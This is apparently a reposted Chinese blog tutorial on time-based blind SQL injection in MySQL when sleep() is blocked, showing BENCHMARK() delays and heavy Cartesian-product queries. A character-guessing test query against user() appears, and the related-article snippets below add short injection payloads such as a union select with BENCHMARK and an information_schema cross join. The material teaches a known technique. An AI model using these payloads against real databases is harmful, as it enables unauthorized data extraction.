sql时间盲注另外两种方式(benchmark,heavy query)

最新推荐文章于 2024-08-01 09:47:47 发布
最新推荐文章于 2024-08-01 09:47:47 发布
阅读量381 收藏 1
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/c1e4r/articles/9060525.html
版权

在某些情况下进行时间盲注的时候,如果sleep()函数无法使用,我们可以使用以下两种方式来达到延时的效果。

1.benchmark()

benchmark是Mysql的一个内置函数,其作用是来测试一些函数的执行速度。benchmark()中带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式

mysql> select BENCHMARK(10000,md5('a'));
+---------------------------+
| BENCHMARK(10000,md5('a')) |
+---------------------------+
|                         0 |
+---------------------------+
1 row in set (0.00 sec)

mysql> select BENCHMARK(1000000,md5('a'));
+-----------------------------+
| BENCHMARK(1000000,md5('a')) |
+-----------------------------+
|                           0 |
+-----------------------------+
1 row in set (0.33 sec)

mysql> select BENCHMARK(10000000,md5('a'));
+------------------------------+
| BENCHMARK(10000000,md5('a')) |
+------------------------------+
|                            0 |
+------------------------------+
1 row in set (2.93 sec)

可以看到,执行不同的次数那么执行的时间也就不一样,通过这个函数我们可以达到与sleep()同样的延时目的。

测试:

mysql> select 1 and if((substr(user(),1,1)='r'),BENCHMARK(10000000,md5('a')),1);
+-------------------------------------------------------------------+
| 1 and if((substr(user(),1,1)='r'),BENCHMARK(10000000,md5('a')),1) |
+-------------------------------------------------------------------+
|                                                                 0 |
+-------------------------------------------------------------------+
1 row in set (2.90 sec)

 

2.heavy query

heavy query顾名思义就是通过做大量的查询导致查询时间较长来达到延时的目的。通常选择一些比较大的表做笛卡尔积运算。

 

参考链接:

http://www.sqlinjection.net/heavy-query/

 

转载于:https://www.cnblogs.com/c1e4r/articles/9060525.html

weixin_34378045
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 延时 注入_MySQL时间盲注五种延时方法
weixin_39561168的博客
01-19 1727
延时注入函数五种:sleep(),benchmark(t,exp),笛卡尔积,GET_LOCK() RLIKE正则sleep()sleep(x)select sleep(5);benchmark() 重复执行某表达式benchmark(t,exp)select benchmark(count,expr),是重复执行count次expr表达式,使得处理时间很长,来产生延迟,比如select benc...
SQL时间盲注
Li_Nice的博客
07-22 302
前言 由于要使用到基于时间盲注,但是我觉得基于时间盲注其实就是基于布尔的盲注的升级版,所以我想顺便把基于布尔的盲注分析总结了;首先我觉得基于时间盲注和基于布尔的盲注的最直观的差别就是“参照物”不同,也就是说基于布尔的盲注,其实是可以通过页面的一些变化来进行判断结果!但是有的时候,执行一些sql语句的测试,页面不会有像布尔盲注的时候比较直观的变化,所以这个时候所谓的基于时间盲注,也就是在基于...
SQL盲注利用工具
11-15
使用Ruby语言编写的一款SQL盲注利用工具,它使用盲注方法SQL数据库检索数据
MYSQL——时间盲注BENCHMARK()
m0_51330619的博客
09-20 3325
先上图看效果 1' union select 1,BENCHMARK(500000000,(select user from users limit 0,1))# 可见benchmark()函数是可以造成延时的。 简介: 它是MySQL的一个内置函数,用于测试函数或者表达式的执行速度。 其运行返回值都是0,仅仅会执行显示时间。 用法:benchmark(重复次数, 执行的函数) 例如:将select database()执行100000000次,显示耗时0.52sec SELECT BENCHMARK(
sql盲注方法
qq_41306131的博客
12-03 306
sql盲注的类型 GET_单引号_字符型 先介绍几个函数 rand()函数 随机函数:返回0~1之间的小鼠。 floor()函数 小数向下取整 count()函数 汇总函数:返回匹配指定条件数据 count(*)显示条数 查询返回结果用concat_ws()连接,就可以看到显示值存在库名 如果concat_ws不用连接符,返回值恒为0 如果在结尾加上表名 显示的就是里面的表的数量 ...
SQL注入-时间盲注
acepanhuan的博客
02-11 2845
SQL注入盲注学习
盲注
weixin_45634365的博客
02-28 4618
一、盲注简介 注入攻击的本质,是把用户输入的数据当做代码执行。 注入攻击的两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 盲注,就是在服务器没有错误回显的时候完成的注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 与盲注相对应的是显错注入,分别为: union select 联合查询注入 updatexml 报错注入 盲注也分为两种: (1)布尔盲注:只会根据注入信息返回True和False,没有了之前的报错信息 (2)时间盲注:界面返
渗透测试-SQL注入之布尔盲注时间盲注
lza20001103的博客
04-20 2915
渗透测试-SQL注入之布尔盲注时间盲注
不再显示错误的盲注
qq_40710190的博客
10-13 463
不再显示错误的盲注 意外的收获 我在对lesson1重新测试单双引号闭合的时候发现了一个有趣的问题。 lesson1的sql源码是 SELECT * FROM users WHERE id='$id' LIMIT 0,1 但是我惊讶的发现我单纯用双引号也能正确的查询 原来如此 下面用这样的table来进行实例讲解. id name 0 admin0 1 admin1 因为SQL在遇到这种情况是会自动转换为int类型比较,如果该字段是int的话。 select * from `us
SQL注入系统学习
Panacea
08-25 673
本次学习共分为十五课时,虽然之前学习过但是感觉并不系统,所以重新学习了一遍 1):sql注入基础 原理: 对用户输入的参数没有进行过滤或者过滤不严格导致语句与数据库进行交互,从而欺骗服务器执行恶意的SQL语句。 危害: 获得、篡改数据库信息,敏感信息泄露 2):注入分类 按照参数类型: 字符型、数字型 数字型 判断方式 ?id=1 and 1=1--+ true ?id=1 and 1=2--+ false 按照注入位置: GET注入、POST注入 根据结果反馈: 布尔盲注时间盲注 3):get
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7216
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
sql注入进阶--跑向mysql
jiangliuzheng的专栏
07-11 7971
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2 2、测试什么的就不用说了,直接sqlmap跑起来。 (1)先看看是什么数据库吧,废话,不是已经剧透了吗。 c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/a
MapReduce and Parallel DBMSs: Friends or Foes?
Mac Track
10-07 1691
一篇很赞的paper,原文地址:http://database.cs.brown.edu/papers/stonebraker-cacm2010.pdf, 另外“银河里的星星”翻译的这篇paper很不错,地址:http://duanple.blog.163.com/blog/
SQL注入——基于时间盲注sqli-labs less9)
yuan114012的博客
05-21 985
一.基于时间盲注 适用场景:没有数据回显,条件正确与否结果一样 利用方式:构造判断条件,添加sleep,逐个猜测(盲猜) 1.所需语法与函数 IF表达式 IF( expr1 , expr2 , expr3 ) #expr1 的值为 TRUE,则返回值为 expr2 #expr1 的值为FALSE,则返回值为 expr3 expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 mysql> select if(1=1,1,.
第二部分:2.盲注的讲解
→_→
03-17 1072
何为盲注盲注就是在 sql 注入过程sql 语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 ,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间SQL 盲注 基于报错的 SQL 盲注 1 :基于布尔 L SQL 盲注 -------...
sql延时小tip:heavy-query
dengzhasong7076的博客
10-31 144
当一个时间盲注不能用sleep等函数的时候,为了达到延时的效果,可以查询一些量比较大的表做笛卡尔集运算,导致查询缓慢。 SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C 出数据的话,就利用and的性质来判断,一般会有这...
sql注入时间盲注
weixin_48421613的博客
08-29 1361
sql 注入之盲注sql注入是十分经典的一个漏洞,相对于文件上传漏洞、xss、业务逻辑漏洞等漏洞也要复杂得多,那么什么是sql注入呢? 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令 那么sql注入又分为哪几种类型呢? 1.字符类型(str)的sql注入 2.整型的(int)的sql注入 3.基于时间型的注入 而sql注入又分为两种情况 1.有明显特征的注入 2.没有明显返回特征的盲注 而我们今天说的
SQL注入时间盲注
最新发布
2201_75572825的博客
08-01 564
在页面,若不管输入什么,数据交互完成以后目标网站都没有正确和错误的页面回显,这个时候我们可以利用页面响应的时间来判断SQL语句有没有在目标数据得到执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值